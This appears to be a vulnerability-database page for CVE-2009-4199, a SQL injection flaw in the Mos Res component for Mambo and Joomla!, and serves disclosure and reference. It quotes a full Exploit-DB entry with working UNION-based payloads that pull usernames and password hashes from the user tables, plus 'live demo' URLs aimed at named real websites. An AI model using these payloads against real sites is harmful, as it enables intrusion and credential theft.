CVE-2009-4199 : Detail

CVE-2009-4199

SQL Injection
A03-Injection
0.07%V3
Network
2009-12-04
18h00 +00:00
2017-09-18
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple SQL injection vulnerabilities in the Mambo Resident (aka Mos Res or com_mosres) component 1.0f for Mambo and Joomla!, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) property_uid parameter in a viewproperty action to index.php and the (2) regID parameter in a showregion action to index.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 8872

Publication date : 2009-06-02 22h00 +00:00
Author : Chip d3 bi0s
EDB Verified : Yes

================================================================================== Joomla Component com_mosres (property_uid) SQL injection Vulnerability ================================================================================== ################################################### [+] Author : Chip D3 Bi0s [+] Author Name : Russell... [+] Email : chipdebios[alt+64]gmail.com [+] Group : LatinHackTeam [+] Vulnerability : SQL injection [+] Google Dork : imagine ;) [+] Email : chipdebios[alt+64]gmail.com ################################################### Conditions : magic_quotes_gpc = Off --------------------------------------------------- Example Joomla: http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code] [SQL code]: null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/* Live Demo: http://ahtopolbg.com/index.php?option=com_mosres&catID=1004&regID=2&task=viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/* --------------------------------------------------- Example Mambo: http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code] [SQL code]: null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/* Live Demo: http://www.velingradbg.com/index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20union%20select%201,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/* ************************** however, still looking ... component, can be injected in several places (not all or always). Almost always SQL injection & also blind sql injection. I let you work ;) http://www.ahtopolbg.com/index.php?option=com_mosres&task=showregion&regID=4%27+and+1=2+union%20select%201,concat(username,0x3a,password)+from+jos_users/*&lang=bg ************************** +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ <name>Mos Res</name> <creationDate>23/02/2005</creationDate> <author>Vince Wooll</author> <copyright> This component is released under the GNU/GPL License </copyright> <authorEmail>mosres@woollyinwales.co.uk</authorEmail> <authorUrl>http://www.mosres.net</authorUrl> <version>1.0f</version> <description>Mambo Resident component for v4.5.2</description> # milw0rm.com [2009-06-03]

Products Mentioned

Configuraton 0

Mamboforge>>Com_mosres >> Version 1.0f

    Joomla>>Joomla\! >> Version *

    Mambo-foundation>>Mambo >> Version *

      References

      http://www.securityfocus.com/bid/35202
      Tags : vdb-entry, x_refsource_BID
      http://www.exploit-db.com/exploits/8872
      Tags : exploit, x_refsource_EXPLOIT-DB